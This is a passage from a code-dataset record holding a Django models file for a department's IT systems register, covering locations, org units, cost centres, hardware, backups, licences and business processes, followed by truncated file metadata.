blank=True)\n\n def __str__(self):\n return \"{} ({})\".format(self.name, self.address)\n\n def as_dict(self):\n return {k: getattr(self, k) for k in (\"name\", \"address\", \"pobox\", \"phone\", \"fax\", \"email\") if getattr(self, k)}\n\n def save(self, *args, **kwargs):\n for orgunit in self.orgunit_set.all():\n orgunit.save()\n super(Location, self).save(*args, **kwargs)\n\n class Meta:\n ordering = ('name',)\n\n\nclass SecondaryLocation(models.Model):\n location = models.ForeignKey(Location)\n name = models.CharField(max_length=256, unique=True)\n manager = models.ForeignKey(tracking.DepartmentUser, on_delete=models.PROTECT, null=True, blank=True)\n phone = models.CharField(max_length=128, null=True, blank=True)\n fax = models.CharField(max_length=128, null=True, blank=True)\n email = models.CharField(max_length=128, null=True, blank=True)\n\n def __str__(self):\n return self.name\n\n def save(self, *args, **kwargs):\n for orgunit in self.orgunit_set.all():\n orgunit.save()\n super(SecondaryLocation, self).save(*args, **kwargs)\n\n def as_dict(self):\n return {k: getattr(self, k) for k in (\"name\", \"phone\", \"fax\", \"email\") if getattr(self, k)}\n\n\nclass OrgUnit(MPTTModel):\n TYPE_CHOICES = (\n (0, \"Department\"),\n (1, \"Division\"),\n (2, \"Branch\"),\n (3, \"Region\"),\n (4, \"Cost Centre\"),\n (5, \"Office\"),\n (6, \"District\"),\n (7, \"Section\"),\n )\n TYPE_CHOICES_DICT = dict(TYPE_CHOICES)\n unit_type = models.PositiveSmallIntegerField(choices=TYPE_CHOICES, default=4)\n ad_guid = models.CharField(max_length=48, unique=True, null=True, editable=False)\n ad_dn = models.CharField(max_length=512, unique=True, null=True, editable=False)\n name = models.CharField(max_length=256, unique=True)\n acronym = models.CharField(max_length=16, null=True, blank=True)\n manager = models.ForeignKey(tracking.DepartmentUser, on_delete=models.PROTECT, null=True, blank=True)\n parent = TreeForeignKey('self', on_delete=models.PROTECT, null=True, blank=True, related_name='children', db_index=True)\n details = JSONField(null=True, blank=True)\n location = models.ForeignKey(Location, on_delete=models.PROTECT, null=True, blank=True)\n secondary_location = models.ForeignKey(SecondaryLocation, on_delete=models.PROTECT, null=True, blank=True)\n\n def cc(self):\n try:\n return self.costcentre\n except:\n return None\n\n def __str__(self):\n name = self.name\n if self.acronym:\n name = \"{} - {}\".format(self.acronym, name)\n if self.cc():\n return \"{} - CC{}\".format(name, self.cc())\n return name\n\n def members(self):\n from tracking.models import DepartmentUser\n return DepartmentUser.objects.filter(org_unit__in=self.get_descendants(include_self=True), **DepartmentUser.ACTIVE_FILTER)\n\n def save(self, *args, **kwargs):\n self.details = self.details or {}\n self.details.update({\n \"type\": self.get_unit_type_display(),\n })\n if self.secondary_location:\n self.location = self.secondary_location.location\n if not getattr(self, \"cheap_save\", False):\n for user in self.departmentuser_set.all():\n user.save()\n super(OrgUnit, self).save(*args, **kwargs)\n\n class MPTTMeta:\n order_insertion_by = ['name']\n\n class Meta:\n ordering = ('name',)\n\n\nclass CostCentre(models.Model):\n name = models.CharField(max_length=25, unique=True, editable=False)\n code = models.CharField(max_length=5, unique=True)\n division = models.ForeignKey(OrgUnit, null=True, editable=False, related_name=\"costcentres_in_division\")\n org_position = models.OneToOneField(OrgUnit, unique=True)\n manager = models.ForeignKey(tracking.DepartmentUser, on_delete=models.PROTECT, related_name=\"manage_ccs\", null=True, blank=True)\n business_manager = models.ForeignKey(tracking.DepartmentUser, on_delete=models.PROTECT, related_name=\"bmanage_ccs\", help_text=\"Business Manager\", null=True, blank=True)\n admin = models.ForeignKey(tracking.DepartmentUser, on_delete=models.PROTECT, related_name=\"admin_ccs\", help_text=\"Admin\", null=True, blank=True)\n tech_contact = models.ForeignKey(tracking.DepartmentUser, on_delete=models.PROTECT, related_name=\"tech_ccs\", help_text=\"Technical Contact\", null=True, blank=True)\n\n def save(self, *args, **kwargs):\n self.name = str(self)\n division = self.org_position.get_ancestors(include_self=True).filter(unit_type=1)\n if division:\n self.division = division.first()\n for user in self.departmentuser_set.all():\n user.save()\n super(CostCentre, self).save(*args, **kwargs)\n\n def __str__(self):\n name = '{}'.format(self.code)\n dept = self.org_position.get_ancestors(include_self=True).filter(unit_type=0)\n if dept:\n name += \" ({})\".format(dept.first().acronym)\n return name\n\n class Meta:\n ordering = ('code',)\n\n\nclass Software(models.Model):\n \"\"\"A model to represent a discrete unit of software (OS, runtime, etc.)\n \"\"\"\n name = models.CharField(max_length=2048, unique=True)\n url = models.CharField(max_length=2000, null=True, blank=True)\n license = models.ForeignKey('registers.SoftwareLicense', on_delete=models.PROTECT, null=True)\n os = models.BooleanField(default=False, verbose_name='OS', help_text='Software is an operating system?')\n\n class Meta:\n verbose_name_plural = 'software'\n\n def __str__(self):\n return self.name\n\n\nclass Hardware(tracking.CommonFields):\n device_type = models.PositiveSmallIntegerField(choices=(\n (1, 'Network'), (2, 'Mobile'), (3, 'Domain PC'), (4, 'Hostname')))\n computer = models.OneToOneField(tracking.Computer, null=True, editable=False)\n mobile = models.OneToOneField(tracking.Mobile, null=True, editable=False)\n username = models.CharField(max_length=128, null=True, editable=False)\n email = models.CharField(max_length=512, null=True, editable=False)\n ipv4 = models.TextField(default='', editable=False)\n ports = models.TextField(default='', editable=False)\n name = models.CharField(max_length=2048, unique=True, editable=False)\n serials = models.TextField(null=True, editable=False)\n local_info = models.TextField(null=True, editable=False)\n local_current = models.BooleanField(default=True, help_text='Does local state match central state?')\n os = models.ForeignKey(\n Software, on_delete=models.PROTECT, null=True, blank=True, limit_choices_to={'os': True},\n verbose_name='operating system')\n location = models.ForeignKey(Location, on_delete=models.PROTECT, null=True, blank=True, help_text='Physical location')\n\n def __str__(self):\n return '{}:{} ({})'.format(self.get_device_type_display(), self.name, self.cost_centre)\n\n class Meta:\n unique_together = ('computer', 'mobile')\n ordering = ('name', '-device_type')\n verbose_name_plural = 'hardware'\n\n\nclass Device(tracking.CommonFields):\n TYPE_CHOICES = (\n (0, \"Computer\"),\n (1, \"Mobile\"),\n (2, \"PRTG\"),\n )\n name = models.CharField(max_length=2048, unique=True)\n owner = models.ForeignKey(tracking.DepartmentUser, on_delete=models.PROTECT, null=True, related_name=\"devices_owned\")\n guid = models.CharField(max_length=48, unique=True, help_text=\"AD GUID (ad:...) or PRTG object id (prtg:...)\")\n device_type = models.PositiveSmallIntegerField(choices=TYPE_CHOICES, default=0)\n\n def __str__(self):\n return self.name\n\n\nclass UserGroup(models.Model):\n \"\"\"A model to represent an arbitrary group of users for an IT System.\n E.g. 'All department staff', 'External govt agency staff', etc.\n \"\"\"\n name = models.CharField(max_length=2048, unique=True)\n user_count = models.PositiveIntegerField(blank=True, null=True)\n\n def __str__(self):\n return '{} ({})'.format(self.name, self.user_count)\n\n\nclass ITSystemHardware(models.Model):\n \"\"\"A model to represent the relationship between an IT System and a\n Hardware entity.\n \"\"\"\n ROLE_CHOICES = (\n (1, 'Application server'),\n (2, 'Database server'),\n (3, 'Network file storage'),\n (4, 'Reverse proxy'),\n )\n host = models.ForeignKey(Hardware, on_delete=models.PROTECT)\n role = models.PositiveSmallIntegerField(choices=ROLE_CHOICES)\n\n class Meta:\n verbose_name_plural = 'IT system hardware'\n unique_together = ('host', 'role')\n\n def __str__(self):\n return '{} ({})'.format(self.host.name, self.role)\n\n\nclass ITSystem(tracking.CommonFields):\n STATUS_CHOICES = (\n (0, \"Production\"),\n (1, \"Development\"),\n (2, \"Production (Legacy)\"),\n (3, \"Decommissioned\"),\n (4, \"Unknown\")\n )\n ACCESS_CHOICES = (\n (1, 'Public Internet'),\n (2, 'Authenticated Extranet'),\n (3, 'Corporate Network'),\n (4, 'Local System (Networked)'),\n (5, 'Local System (Standalone)')\n )\n AUTHENTICATION_CHOICES = (\n (1, 'Domain Credentials'),\n (2, 'Single Sign On'),\n (3, 'Externally Managed')\n )\n AVAILABILITY_CHOICES = (\n (1, '24 hours a day, 7 days a week, 365 days a year'),\n (2, 'Department core business hours'),\n )\n SYSTEM_TYPE_CHOICES = (\n (1, 'Web application'),\n (2, 'Client application'),\n (3, 'Mobile application'),\n (4, 'Service'),\n )\n name = models.CharField(max_length=128, unique=True)\n system_id = models.CharField(max_length=16, unique=True)\n acronym = models.CharField(max_length=16, null=True, blank=True)\n status = models.PositiveSmallIntegerField(choices=STATUS_CHOICES, default=4)\n status_display = models.CharField(max_length=128, null=True, editable=False)\n description = models.TextField(blank=True)\n devices = models.ManyToManyField(Device, blank=True)\n owner = models.ForeignKey(tracking.DepartmentUser, on_delete=models.PROTECT, null=True, related_name=\"systems_owned\", help_text=\"Application owner\")\n custodian = models.ForeignKey(tracking.DepartmentUser, on_delete=models.PROTECT, null=True, related_name=\"systems_custodianed\", help_text=\"Appication custodian\")\n data_custodian = models.ForeignKey(tracking.DepartmentUser, on_delete=models.PROTECT, related_name=\"systems_data_custodianed\", null=True, blank=True)\n preferred_contact = models.ForeignKey(tracking.DepartmentUser, on_delete=models.PROTECT, related_name=\"systems_preferred_contact\", null=True, blank=True)\n link = models.CharField(max_length=2048, null=True, blank=True, help_text=\"URL to web application\")\n documentation = models.URLField(max_length=2048, null=True, blank=True, help_text=\"URL to end-user documentation\")\n technical_documentation = models.URLField(max_length=2048, null=True, blank=True, help_text=\"URL to technical documentation\")\n status_html = models.URLField(max_length=2048, null=True, blank=True, help_text=\"URL to status/uptime info\")\n authentication = models.PositiveSmallIntegerField(choices=AUTHENTICATION_CHOICES, default=1)\n authentication_display = models.CharField(max_length=128, null=True, editable=False)\n access = models.PositiveSmallIntegerField(choices=ACCESS_CHOICES, default=3)\n access_display = models.CharField(max_length=128, null=True, editable=False)\n request_access = models.TextField(blank=True)\n criticality = models.PositiveIntegerField(choices=CRITICALITY_CHOICES, null=True, blank=True)\n availability = models.PositiveIntegerField(choices=AVAILABILITY_CHOICES, null=True, blank=True, help_text='Expected availability for this IT System')\n schema_url = models.URLField(max_length=2048, null=True, blank=True, help_text='URL to schema diagram')\n user_groups = models.ManyToManyField(UserGroup, blank=True, help_text='User group(s) that use this IT System')\n softwares = models.ManyToManyField(Software, blank=True, help_text='Software that is used to provide this IT System')\n hardwares = models.ManyToManyField(ITSystemHardware, blank=True, help_text='Hardware that is used to provide this IT System')\n bh_support = models.ForeignKey(\n tracking.DepartmentUser, on_delete=models.PROTECT, null=True, blank=True, related_name=\"bh_support\",\n verbose_name='business hours support', help_text='Business hours support contact')\n ah_support = models.ForeignKey(\n tracking.DepartmentUser, on_delete=models.PROTECT, null=True, blank=True, related_name=\"ah_support\",\n verbose_name='after hours support', help_text='After-hours support contact')\n system_reqs = models.TextField(blank=True, help_text='A written description of the requirements to use the system (e.g. web browser version)')\n system_type = models.PositiveSmallIntegerField(choices=SYSTEM_TYPE_CHOICES, null=True, blank=True)\n vulnerability_docs = models.URLField(max_length=2048, null=True, blank=True, help_text='URL to documentation related to known vulnerability reports')\n workaround = models.TextField(blank=True, help_text='Written procedure for users to work around an outage of this system')\n recovery_docs = models.URLField(max_length=2048, null=True, blank=True, help_text='URL to recovery procedure(s) in the event of system failure')\n mtd = models.DurationField(help_text=\"Maximum Tolerable Downtime (days hh:mm:ss)\", default=timedelta(days=14))\n rto = models.DurationField(help_text=\"Recovery Time Objective (days hh:mm:ss)\", default=timedelta(days=7))\n rpo = models.DurationField(help_text=\"Recovery Point Objective/Data Loss Interval (days hh:mm:ss)\", default=timedelta(hours=24))\n contingency_plan = models.FileField(\n blank=True, null=True, max_length=255, upload_to='uploads/%Y/%m/%d',\n help_text='NOTE: changes to this field will delete current contingency plan approvals.')\n contingency_plan_status = models.PositiveIntegerField(\n choices=DOC_STATUS_CHOICES, null=True, blank=True)\n contingency_plan_approvals = models.ManyToManyField(DocumentApproval, blank=True)\n contingency_plan_last_tested = models.DateField(\n null=True, blank=True, help_text='Date that the plan was last tested.')\n\n def __init__(self, *args, **kwargs):\n super(ITSystem, self).__init__(*args, **kwargs)\n # Store the pre-save values of some fields on object init.\n self.__original_contingency_plan = self.contingency_plan\n\n def __str__(self):\n return self.name\n\n class Meta:\n verbose_name = \"IT System\"\n ordering = ['name']\n\n def description_html(self):\n return mark_safe(self.description)\n\n def save(self, *args, **kwargs):\n if not self.system_id:\n self.system_id = \"S{0:03d}\".format(ITSystem.objects.order_by(\"-pk\").first().pk+1)\n self.status_display = self.get_status_display()\n self.authentication_display = self.get_authentication_display()\n if not self.link: # systems with no link default to device\n self.access = 4\n self.access_display = self.get_access_display()\n super(ITSystem, self).save(*args, **kwargs)\n\n\nclass Backup(tracking.CommonFields):\n ROLE_CHOICES = (\n (0, \"Generic Server\"),\n (1, \"Domain Controller\"),\n (2, \"Database Server\"),\n (3, \"Application Host\"),\n (4, \"Management Server\"),\n (5, \"Site Server\"),\n (6, \"File Server\"),\n (7, \"Print Server\"),\n (8, \"Block Storage Server\"),\n (9, \"Email Server\"),\n (10, \"Network Device\"))\n STATUS_CHOICES = (\n (0, \"Production\"),\n (1, \"Pre-Production\"),\n (2, \"Legacy\"),\n (3, \"Decommissioned\")\n )\n SCHEDULE_CHOICES = (\n (0, \"Manual\"),\n (1, \"Point in time, 7 day retention\"),\n (2, \"Daily, 7 day retention\"),\n (3, \"Daily, 30 day retention\"),\n (4, \"Weekly, 1 month retention\")\n )\n system = models.OneToOneField(Hardware)\n operating_system = models.CharField(max_length=120)\n parent_host = models.ForeignKey(Hardware, on_delete=models.PROTECT, null=True, blank=True, related_name=\"host\")\n role = models.PositiveSmallIntegerField(choices=ROLE_CHOICES, default=0)\n status = models.PositiveSmallIntegerField(choices=STATUS_CHOICES, default=0)\n database_backup = models.CharField(max_length=2048, null=True, blank=True, help_text=\"URL to Database backup/restore/logs info\")\n database_schedule = models.PositiveSmallIntegerField(choices=SCHEDULE_CHOICES, default=0)\n filesystem_backup = models.CharField(max_length=2048, null=True, blank=True, help_text=\"URL to Filesystem backup/restore/logs info\")\n filesystem_schedule = models.PositiveSmallIntegerField(choices=SCHEDULE_CHOICES, default=0)\n appdata_backup = models.CharField(max_length=2048, null=True, blank=True, help_text=\"URL to Application Data backup/restore/logs info\")\n appdata_schedule = models.PositiveSmallIntegerField(choices=SCHEDULE_CHOICES, default=0)\n appconfig_backup = models.CharField(max_length=2048, null=True, blank=True, help_text=\"URL to Config for App/Server\")\n appconfig_schedule = models.PositiveSmallIntegerField(choices=SCHEDULE_CHOICES, default=0)\n os_backup = models.CharField(max_length=2048, null=True, blank=True, help_text=\"URL to Build Documentation\")\n os_schedule = models.PositiveSmallIntegerField(choices=SCHEDULE_CHOICES, default=0)\n last_tested = models.DateField(null=True, blank=True, help_text=\"Last tested date\")\n test_schedule = models.PositiveSmallIntegerField(default=12, help_text=\"Test Schedule in Months, 0 for never\")\n comment = models.TextField(blank=True)\n\n def next_test_date(self):\n if self.test_schedule == 0:\n return \"Doesn't require testing\"\n if not self.last_tested:\n return \"NEVER TESTED\"\n else:\n return self.last_tested + relativedelta(months=self.test_schedule)\n\n def test_overdue(self):\n if self.test_schedule == 0:\n return False\n if not self.last_tested:\n return True\n return self.next_test_date() < timezone.now().date()\n\n def __str__(self):\n return \"{} ({})\".format(self.system.name.split(\".\")[0], self.get_status_display())\n\n class Meta:\n ordering = (\"system__name\",)\n\n\nclass Vendor(models.Model):\n name = models.CharField(max_length=256, unique=True)\n details = models.TextField(blank=True)\n extra_data = JSONField(default=dict(), null=True, blank=True)\n\n def __str__(self):\n return self.name\n\n\nclass SoftwareLicense(tracking.CommonFields):\n \"\"\"\n Represents a software licensing arrangement.\n \"\"\"\n name = models.CharField(max_length=256, unique=True)\n url = models.URLField(max_length=2000, null=True, blank=True)\n support = models.TextField(blank=True, help_text='Support timeframe or scope')\n support_url = models.URLField(max_length=2000, null=True, blank=True)\n oss = models.NullBooleanField(default=None, help_text='Open-source/free software license?')\n primary_user = models.ForeignKey(tracking.DepartmentUser, on_delete=models.PROTECT, null=True, blank=True)\n devices = models.ManyToManyField(Device, blank=True)\n vendor = models.ForeignKey(Vendor, on_delete=models.PROTECT, null=True, blank=True)\n used_licenses = models.PositiveSmallIntegerField(default=0, editable=False)\n available_licenses = models.PositiveSmallIntegerField(default=0, null=True, blank=True)\n license_details = models.TextField(blank=True, help_text=\"Direct license keys or details\")\n\n def __str__(self):\n return self.name\n\n\nclass BusinessService(models.Model):\n \"\"\"Represents the Department's core business services.\n \"\"\"\n number = models.PositiveIntegerField(unique=True, help_text='Service number')\n name = models.CharField(max_length=256, unique=True)\n description = models.TextField(null=True, blank=True)\n\n def __str__(self):\n return 'Service {}: {}'.format(self.number, self.name)\n\n\nclass BusinessFunction(models.Model):\n \"\"\"Represents a function of the Department, undertaken to meet the\n Department's core services. Each function must be linked to 1+\n BusinessService object.\n \"\"\"\n name = models.CharField(max_length=256, unique=True)\n description = models.TextField(null=True, blank=True)\n services = models.ManyToManyField(BusinessService)\n\n def __str__(self):\n return self.name\n\n\nclass BusinessProcess(models.Model):\n \"\"\"Represents a business process that the Department undertakes in order\n to fulfil one of the Department's functions.\n \"\"\"\n name = models.CharField(max_length=256, unique=True)\n description = models.TextField(null=True, blank=True)\n functions = models.ManyToManyField(BusinessFunction)\n criticality = models.PositiveIntegerField(\n choices=CRITICALITY_CHOICES, null=True, blank=True, help_text='How critical is the process?')\n\n class Meta:\n verbose_name_plural = 'business processes'\n\n def __str__(self):\n return self.name\n\n\nclass ProcessITSystemRelationship(models.Model):\n \"\"\"A model to represent the relationship between a BusinessProcess and an\n ITSystem object.\n \"\"\"\n process = models.ForeignKey(BusinessProcess, on_delete=models.PROTECT)\n itsystem = models.ForeignKey(ITSystem, on_delete=models.PROTECT)\n importance = models.PositiveIntegerField(\n choices=IMPORTANCE_CHOICES, help_text='How important is the IT System to undertaking this process?')\n\n class Meta:\n unique_together = ('process', 'itsystem')\n\n def __str__(self):\n return '{} - {} ({})'.format(self.itsystem.name, self.process.name, self.get_importance_display())\n\n\nclass ITSystemDependency(models.Model):\n \"\"\"A model to represent a dependency that an ITSystem has on another, plus\n the criticality of that dependency.\n \"\"\"\n itsystem = models.ForeignKey(\n ITSystem, on_delete=models.PROTECT, verbose_name='IT System', help_text='The IT System')\n dependency = models.ForeignKey(\n ITSystem, on_delete=models.PROTECT, related_name='dependency',\n help_text='The system which is depended upon by the IT System')\n criticality = models.PositiveIntegerField(\n choices=CRITICALITY_CHOICES, help_text='How critical is the dependency?')\n\n class Meta:\n verbose_name = 'IT System dependency'\n verbose_name_plural = 'IT System dependencies'\n unique_together = ('itsystem', 'dependency')\n\n def __str__(self):\n return '{} - {} ({})'.format(self.itsystem.name, self.dependency.name, self.get_criticality_display())\n", "sub_path": "registers/models.py", "file_name": "models.py", "file_ext": "py", "file_size_in_byte": 25168, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "12", "api": [{"api_name": "django.contrib.gis.db.models.Model", "line_number": 31, "usage_type": "attribute"}, {"api_name": "django.contrib.gis.db.models", "line_number": 31, "usage_type": "name"}, {"api_name": "django.contrib.gis.db.models.ForeignKey", "line_number": 35, "usage_type": "call"}, {"api_name": "django.contrib.gis.db.models", "line_number": 35, "usage_type": "name"}, {"api_name": "tracking.models.DepartmentUser", "line_number": 35, "usage_type": "attribute"}, {"api_name": "tracking.models", "line_number": 35, "usage_type": "name"}, {"api_name": "django.contrib.gis.db.models.PROTECT", "line_number": 35, "usage_type": "attribute"}, {"api_name": "django.contrib.gis.db.models.CharField", "line_number": 36, "usage_type": "call"}, {"api_name": "django.contrib.gis.db.models", "line_number": 36, "usage_type": "name"}, {"api_name": "django.contrib.gis.db.models.FileField", "line_number": 39, "usage_type": "call"}, {"api_name": "django.contrib.gis.db.models", "line_number": 39, "usage_type": "name"}, {"api_name": "django.contrib.gis.db.models.DateTimeField", "line_number": 42, "usage_type": "call"}, {"api_name": "django.contrib.gis.db.models", "line_number": 42, "usage_type": "name"}, {"api_name": "datetime.datetime.strftime", "line_number": 48, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 48, "usage_type": "name"}, {"api_name": "datetime.datetime.strftime", "line_number": 51, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 51, "usage_type": "name"}, {"api_name": "django.contrib.gis.db.models.Model", "line_number": 54, "usage_type": "attribute"}, {"api_name": "django.contrib.gis.db.models", "line_number": 54, "usage_type": "name"}, {"api_name": "django.contrib.gis.db.models.CharField", "line_number": 55, "usage_type": "call"}, {"api_name": "django.contrib.gis.db.models", "line_number": 55, "usage_type": "name"}, {"api_name": "django.contrib.gis.db.models.ForeignKey", "line_number": 56, "usage_type": "call"}, {"api_name": "django.contrib.gis.db.models", "line_number": 56, "usage_type": "name"}, {"api_name": "tracking.models.DepartmentUser", "line_number": 56, "usage_type": "attribute"}, {"api_name": "tracking.models", "line_number": 56, "usage_type": "name"}, {"api_name": "django.contrib.gis.db.models.PROTECT", "line_number": 56, "usage_type": "attribute"}, {"api_name": "django.contrib.gis.db.models.TextField", "line_number": 57, "usage_type": "call"}, {"api_name": "django.contrib.gis.db.models", "line_number": 57, "usage_type": "name"}, {"api_name": "django.contrib.gis.db.models.TextField", "line_number": 58, "usage_type": "call"}, {"api_name": "django.contrib.gis.db.models", "line_number": 58, "usage_type": "name"}, {"api_name": "django.contrib.gis.db.models.CharField", "line_number": 59, "usage_type": "call"}, {"api_name": "django.contrib.gis.db.models", "line_number": 59, "usage_type": "name"}, {"api_name": "django.contrib.gis.db.models.CharField", "line_number": 60, "usage_type": "call"}, {"api_name": "django.contrib.gis.db.models", "line_number": 60, "usage_type": "name"}, {"api_name": "django.contrib.gis.db.models.CharField", "line_number": 61, "usage_type": "call"}, {"api_name": "django.contrib.gis.db.models", "line_number": 61, "usage_type": "name"}, {"api_name": "django.contrib.gis.db.models.PointField", "line_number": 62, "usage_type": "call"}, {"api_name": "django.contrib.gis.db.models", "line_number": 62, "usage_type": "name"}, {"api_name": "django.contrib.gis.db.models.CharField", "line_number": 63, "usage_type": "call"}, {"api_name": "django.contrib.gis.db.models", "line_number": 63, "usage_type": "name"}, {"api_name": "django.contrib.gis.db.models.CharField", "line_number": 64, "usage_type": "call"}, {"api_name": "django.contrib.gis.db.models", "line_number": 64, "usage_type": "name"}, {"api_name": "django.contrib.gis.db.models.Model", "line_number": 81, "usage_type": "attribute"}, {"api_name": "django.contrib.gis.db.models", "line_number": 81, "usage_type": "name"}, {"api_name": "django.contrib.gis.db.models.ForeignKey", "line_number": 82, "usage_type": "call"}, {"api_name": "django.contrib.gis.db.models", "line_number": 82, "usage_type": "name"}, {"api_name": "django.contrib.gis.db.models.CharField", "line_number": 83, "usage_type": "call"}, {"api_name": "django.contrib.gis.db.models", "line_number": 83, "usage_type": "name"}, {"api_name": "django.contrib.gis.db.models.ForeignKey", "line_number": 84, "usage_type": "call"}, {"api_name": "django.contrib.gis.db.models", "line_number": 84, "usage_type": "name"}, {"api_name": "tracking.models.DepartmentUser", "line_number": 84, "usage_type": "attribute"}, {"api_name": "tracking.models", "line_number": 84, "usage_type": "name"}, {"api_name": "django.contrib.gis.db.models.PROTECT", "line_number": 84, "usage_type": "attribute"}, {"api_name": "django.contrib.gis.db.models.CharField", "line_number": 85, "usage_type": "call"}, {"api_name": "django.contrib.gis.db.models", "line_number": 85, "usage_type": "name"}, {"api_name": "django.contrib.gis.db.models.CharField", "line_number": 86, "usage_type": "call"}, {"api_name": "django.contrib.gis.db.models", "line_number": 86, "usage_type": "name"}, {"api_name": "django.contrib.gis.db.models.CharField", "line_number": 87, "usage_type": "call"}, {"api_name": "django.contrib.gis.db.models", "line_number": 87, "usage_type": "name"}, {"api_name": "mptt.models.MPTTModel", "line_number": 101, "usage_type": "name"}, {"api_name": "django.contrib.gis.db.models.PositiveSmallIntegerField", "line_number": 113, "usage_type": "call"}, {"api_name": "django.contrib.gis.db.models", "line_number": 113, "usage_type": "name"}, {"api_name": "django.contrib.gis.db.models.CharField", "line_number": 114, "usage_type": "call"}, {"api_name": "django.contrib.gis.db.models", "line_number": 114, "usage_type": "name"}, {"api_name": "django.contrib.gis.db.models.CharField", "line_number": 115, "usage_type": "call"}, {"api_name": "django.contrib.gis.db.models", "line_number": 115, "usage_type": "name"}, {"api_name": "django.contrib.gis.db.models.CharField", "line_number": 116, "usage_type": "call"}, {"api_name": "django.contrib.gis.db.models", "line_number": 116, "usage_type": "name"}, {"api_name": "django.contrib.gis.db.models.CharField", "line_number": 117, "usage_type": "call"}, {"api_name": "django.contrib.gis.db.models", "line_number": 117, "usage_type": "name"}, {"api_name": "django.contrib.gis.db.models.ForeignKey", "line_number": 118, "usage_type": "call"}, {"api_name": "django.contrib.gis.db.models", "line_number": 118, "usage_type": "name"}, {"api_name": "tracking.models.DepartmentUser", "line_number": 118, "usage_type": "attribute"}, {"api_name": "tracking.models", "line_number": 118, "usage_type": "name"}, {"api_name": "django.contrib.gis.db.models.PROTECT", "line_number": 118, "usage_type": "attribute"}, {"api_name": "mptt.models.TreeForeignKey", "line_number": 119, "usage_type": "call"}, {"api_name": "django.contrib.gis.db.models.PROTECT", "line_number": 119, "usage_type": "attribute"}, {"api_name": "django.contrib.gis.db.models", "line_number": 119, "usage_type": "name"}, {"api_name": "django.contrib.postgres.fields.JSONField", "line_number": 120, "usage_type": "call"}, {"api_name": "django.contrib.gis.db.models.ForeignKey", "line_number": 121, "usage_type": "call"}, {"api_name": "django.contrib.gis.db.models", "line_number": 121, "usage_type": "name"}, {"api_name": "django.contrib.gis.db.models.PROTECT", "line_number": 121, "usage_type": "attribute"}, {"api_name": "django.contrib.gis.db.models.ForeignKey", "line_number": 122, "usage_type": "call"}, {"api_name": "django.contrib.gis.db.models", "line_number": 122, "usage_type": "name"}, {"api_name": "django.contrib.gis.db.models.PROTECT", "line_number": 122, "usage_type": "attribute"}, {"api_name": "tracking.models.DepartmentUser.objects.filter", "line_number": 140, "usage_type": "call"}, {"api_name": "tracking.models.DepartmentUser.objects", "line_number": 140, "usage_type": "attribute"}, {"api_name": "tracking.models.DepartmentUser", "line_number": 140, "usage_type": "name"}, {"api_name": "tracking.models.DepartmentUser.ACTIVE_FILTER", "line_number": 140, "usage_type": "attribute"}, {"api_name": "django.contrib.gis.db.models.Model", "line_number": 161, "usage_type": "attribute"}, {"api_name": "django.contrib.gis.db.models", "line_number": 161, "usage_type": "name"}, {"api_name": "django.contrib.gis.db.models.CharField", "line_number": 162, "usage_type": "call"}, {"api_name": "django.contrib.gis.db.models", "line_number": 162, "usage_type": "name"}, {"api_name": "django.contrib.gis.db.models.CharField", "line_number": 163, "usage_type": "call"}, {"api_name": "django.contrib.gis.db.models", "line_number": 163, "usage_type": "name"}, {"api_name": "django.contrib.gis.db.models.ForeignKey", "line_number": 164, "usage_type": "call"}, {"api_name": "django.contrib.gis.db.models", "line_number": 164, "usage_type": "name"}, {"api_name": "django.contrib.gis.db.models.OneToOneField", "line_number": 165, "usage_type": "call"}, {"api_name": "django.contrib.gis.db.models", "line_number": 165, "usage_type": "name"}, {"api_name": "django.contrib.gis.db.models.ForeignKey", "line_number": 166, "usage_type": "call"}, {"api_name": "django.contrib.gis.db.models", "line_number": 166, "usage_type": "name"}, {"api_name": "tracking.models.DepartmentUser", "line_number": 166, "usage_type": "attribute"}, {"api_name": "tracking.models", "line_number": 166, "usage_type": "name"}, {"api_name": "django.contrib.gis.db.models.PROTECT", "line_number": 166, "usage_type": "attribute"}, {"api_name": "django.contrib.gis.db.models.ForeignKey", "line_number": 167, "usage_type": "call"}, {"api_name": "django.contrib.gis.db.models", "line_number": 167, "usage_type": "name"}, {"api_name": "tracking.models.DepartmentUser", "line_number": 167, "usage_type": "attribute"}, {"api_name": "tracking.models", "line_number": 167, "usage_type": "name"}, {"api_name": "django.contrib.gis.db.models.PROTECT", "line_number": 167, "usage_type": "attribute"}, {"api_name": "django.contrib.gis.db.models.ForeignKey", "line_number": 168, "usage_type": "call"}, {"api_name": "django.contrib.gis.db.models", "line_number": 168, "usage_type": "name"}, {"api_name": "tracking.models.DepartmentUser", "line_number": 168, "usage_type": "attribute"}, {"api_name": "tracking.models", "line_number": 168, "usage_type": "name"}, {"api_name": "django.contrib.gis.db.models.PROTECT", "line_number": 168, "usage_type": "attribute"}, {"api_name": "django.contrib.gis.db.models.ForeignKey", "line_number": 169, "usage_type": "call"}, {"api_name": "django.contrib.gis.db.models", "line_number": 169, "usage_type": "name"}, {"api_name": "tracking.models.DepartmentUser", "line_number": 169, "usage_type": "attribute"}, {"api_name": "tracking.models", "line_number": 169, "usage_type": "name"}, {"api_name": "django.contrib.gis.db.models.PROTECT", "line_number": 169, "usage_type": "attribute"}, {"api_name": "django.contrib.gis.db.models.Model", "line_number": 191, "usage_type": "attribute"}, {"api_name": "django.contrib.gis.db.models", "line_number": 191, "usage_type": "name"}, {"api_name": "django.contrib.gis.db.models.CharField", "line_number": 194, "usage_type": "call"}, {"api_name": "django.contrib.gis.db.models", "line_number": 194, "usage_type": "name"}, {"api_name": "django.contrib.gis.db.models.CharField", "line_number": 195, "usage_type": "call"}, {"api_name": "django.contrib.gis.db.models", "line_number": 195, "usage_type": "name"}, {"api_name": "django.contrib.gis.db.models.ForeignKey", "line_number": 196, "usage_type": "call"}, {"api_name": "django.contrib.gis.db.models", "line_number": 196, "usage_type": "name"}, {"api_name": "django.contrib.gis.db.models.PROTECT", "line_number": 196, "usage_type": "attribute"}, {"api_name": "django.contrib.gis.db.models.BooleanField", "line_number": 197, "usage_type": "call"}, {"api_name": "django.contrib.gis.db.models", "line_number": 197, "usage_type": "name"}, {"api_name": "tracking.models.CommonFields", "line_number": 206, "usage_type": "attribute"}, {"api_name": "tracking.models", "line_number": 206, "usage_type": "name"}, {"api_name": "django.contrib.gis.db.models.PositiveSmallIntegerField", "line_number": 207, "usage_type": "call"}, {"api_name": "django.contrib.gis.db.models", "line_number": 207, "usage_type": "name"}, {"api_name": 